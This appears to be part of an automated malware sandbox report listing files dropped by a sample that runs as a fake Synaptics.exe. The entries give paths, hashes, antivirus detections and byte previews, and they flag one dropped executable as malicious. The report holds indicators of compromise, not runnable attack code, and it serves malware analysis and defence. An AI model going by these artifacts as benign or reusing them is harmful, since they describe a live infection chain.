                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.2675017651506595
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0lSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+i+pAZewRDK4mW
                                                                                                                                                                                  MD5:E2758FD1176B9AD6ED0FF37218FEEADD
                                                                                                                                                                                  SHA1:4398397BDD01476D7941382F3CF970E6E782BCBC
                                                                                                                                                                                  SHA-256:FB5FDF88CBA7C5609DB0C30E70BA6B04A91C37DCDB18F13522973BA79F89AE9A
                                                                                                                                                                                  SHA-512:EAD4FC74ADAF6D7BA72CCD5AA699569731C1BAB5603B859930D0130D73FF2C4F33CB972C95DED8299E7C97735063D2606D944EBD6E339F88BF6255DC161AEC31
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="J_ccHA_UVVi8M5U2jH3eQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Y1lkYiF.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.2583066645133645
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+01+jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+nj+pAZewRDK4mW
                                                                                                                                                                                  MD5:4A3172B7B315A3184E83E3DA82A7A8F6
                                                                                                                                                                                  SHA1:CF4388AAE5812EC2C4125C7704665CDC897E3487
                                                                                                                                                                                  SHA-256:68E85F5B7F2E62C75DC638710D00678D2EF573BBCCB33786A1112D0C870D0658
                                                                                                                                                                                  SHA-512:E0189983E9A27DA0301D724B185D72C08898900CB7E1B4B0A0E33629F320A44106C0D523E5B9F55CBBDDAF0229EA783CD949E7E248658647FBFF91A979E07A93
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9nfiIg4R6U_M1dwLTw7FyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):771584
                                                                                                                                                                                  Entropy (8bit):6.644060003425038
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I4r:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                                                                                                                  MD5:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                  SHA1:B1E3866401ECA22981F985C17CB4CD9C36F85486
                                                                                                                                                                                  SHA-256:2B88A30E06873F61842038EC6C0E51B954DB482CD4641E33F01B3E80AF9F168D
                                                                                                                                                                                  SHA-512:ED72F56294BDF292A6EB1953CD657842CCFA2DCF3C5E69F24A1B11E19E5D8BD73DA5AAFB5F171CE91DBB07776CF8C2BF9028035E152E2CC8311A3CD21E51A886
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\YC9w8Aif.ico

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 32x32, 32 colors
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4286
                                                                                                                                                                                  Entropy (8bit):4.355890074651617
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:G8IhVsAOVS+3P7sZqt8+7tCSWhlTB/ryOLkTJNzyyyyyyyUH/seOY8k9H09kI27:SJOVhzU0tBOVTyOLsfFWeUH27
                                                                                                                                                                                  MD5:076675FE01F793F7DFFE82D24F4E806A
                                                                                                                                                                                  SHA1:2E2E04D353C34A60E3B5CCBE0C3D120FE719B656
                                                                                                                                                                                  SHA-256:CB54C21B707D3879D091A49D459B1BE287B922952286B55EF1DFB7249C21A93C
                                                                                                                                                                                  SHA-512:B8720EA4D858777C91ED355C6D3C04B7DCF3A8318A044400A1C1FF10A06FA91E2A8446B900E910D41CDE9FCDB64FDDEF5F4BAD3FFAEE1CDA3D27457EF849DD0C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...... .............(... ...@..... ................................................f...................................................................................f............................................hfc.........................................................................hfc........................................L...................................................................................................L............................MLK.........................................................................................MLK.................................fec.........................................................................................fec.................................gge.........................................................................................gge.................................ihg..............|..........................................................................ihg.................................jii..........{............

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iivijlnh.tvc.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lqiaigga.n0f.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqjqhruh.5xf.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfhs1qp5.1e4.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cacert.pem

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1245
                                                                                                                                                                                  Entropy (8bit):5.462849750105637
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                                                                                                                                                                  MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                                                                                                                                                                  SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                                                                                                                                                                  SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                                                                                                                                                                  SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\gDI1ITp.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.2538488495012965
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0jfuHSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+fH+pAZewRDK4mW
                                                                                                                                                                                  MD5:4C48E0B87A4974DA3DE8457A715269D3
                                                                                                                                                                                  SHA1:DDB4D66024C5BA01BC25E48D0395C8B41A2682EF
                                                                                                                                                                                  SHA-256:23C673444C8F195FEB25442859855FA082B349C9AC651D869131BFD6FE901964
                                                                                                                                                                                  SHA-512:9BDD4325033BF6C4ECC3E3AA23997A8AF96E011335661BB6FB352FCEF25A0449D51ED510669A71C8ED1D5179717C721490F0913AB6141BFCDBA37DCF0B82877D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9rowmsU0DcTwrnBwJYGhWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\hbqA6yu.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.241966032718902
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0cGvXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+o+pAZewRDK4mW
                                                                                                                                                                                  MD5:4B9B6FD7A34D94AD24A87D76D3FDD2C3
                                                                                                                                                                                  SHA1:8141F00B616B6CA841ED57D82EB1EB0B7613A12C
                                                                                                                                                                                  SHA-256:D21DBDEECCD85A7EB3C3BA85F8DF0D45902787F488BF1270B19A6853F6D5F13F
                                                                                                                                                                                  SHA-512:89C0DE2A01F887724788F26237FD423907CB4042E25F5CF2D5AC1383CA34EE4EDAC18F66976B35B93D82E056C59D843047A4AA4FD05A8436298A94E8E5E9C583
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dsA2arxck7u2U5qhAr4E-w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\is9f5lp.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.2761258398996995
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0wwDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+OD+pAZewRDK4mW
                                                                                                                                                                                  MD5:176F1492E63CC1F711735979D8A32171
                                                                                                                                                                                  SHA1:035F7B4A86A3DD76CDAD7A682040F69997FA44F1
                                                                                                                                                                                  SHA-256:5CB68617B56B399933755F09D64E5B3032E98F018FEDDADC0C5881C44A5861EE
                                                                                                                                                                                  SHA-512:D93CAA484C432D2FC67EACB34FDCA9C7E2412D30F7A32C66F35699D7DD649E66CD85A2E26B5AC88B9B6467447202E912D74DC4C01B060DA1D975F4D7D093D273
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="X3IGjGNMuI5AT021HdRqHQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\kKBEMnN.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.247285736491689
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0pSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+6+pAZewRDK4mW
                                                                                                                                                                                  MD5:34E8A34A8823300FE9E6C2D1ECB4625C
                                                                                                                                                                                  SHA1:EF1DF33551C1F46F8E2EAAC6399B96857EC3DE23
                                                                                                                                                                                  SHA-256:E0B88938C54900BB7A6AF22DA6A9862D79C04560566DCBC875A54EB5E8C4A847
                                                                                                                                                                                  SHA-512:6934B3469C18C029F880181B3F9B8647F68C510ADE9AC29D80C081FA155D3F4BF13DDBF6097D2355ECE93BDB7968B64A6ED48091588505BF2C538A7144871B5A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="df4llUM1_a5yRnvczvu9sA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nnXaK8k.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.2706656883077185
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0XKq+3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+X+pAZewRDK4mW
                                                                                                                                                                                  MD5:03C4197A74BD1FF6F45FB95D05FCA272
                                                                                                                                                                                  SHA1:2988F1E5E719189717A4C3C570F7A51E5ADBB493
                                                                                                                                                                                  SHA-256:EE86F8E80C639AE711C59ADB3AD51C3C6CBF4A7AD6CE97F79D405198678F5809
                                                                                                                                                                                  SHA-512:9EFFB84272D34E842A09B2A26E3940D08A4C925C45934F3112DB13A92075B22F0A3AD315A48DF291CBE3AA4AC718F9B385144396540873C8F2446EEC347FE800
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FbcWRuaiKHhu9Uf8QMKCOQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                  Entropy (8bit):5.814115788739565
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                                                                  MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                                                                  SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                                                                                  SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                                                                                  SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\olE9oXI.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.264099888586555
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0zDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+kD+pAZewRDK4mW
                                                                                                                                                                                  MD5:1777D1776247C1C150D1386480A52D5F
                                                                                                                                                                                  SHA1:0A6B244BCD6F0C091C3702956E626F102EA0ECB5
                                                                                                                                                                                  SHA-256:6758A377D86B503565A8E871C887D7AD9401E05677514C422913B0C6C2463182
                                                                                                                                                                                  SHA-512:932E56AA1501AE8A1A669F2446490C0A11942FED49CC775B924BB989061090D5DE6F311CBA2AAA94419BF5F64242C1E45BFFF091817F7EE8680EB8ECE55A2D5B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cMw69lcQftZBEgjRqwMv0Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\open-menu-symbolic.symbolic.png

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):106
                                                                                                                                                                                  Entropy (8bit):5.091457983029907
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:yionv//thPl9vt3lAnsrtxBllNM9NlysfLsQmv//lH1p:6v/lhPysH8Nlysfmv/Tp
                                                                                                                                                                                  MD5:89B8C9C7F53554F3C57C1BF4881BC0CA
                                                                                                                                                                                  SHA1:D3231B624F8C2DD2A569F0B87BD58162412CF5C8
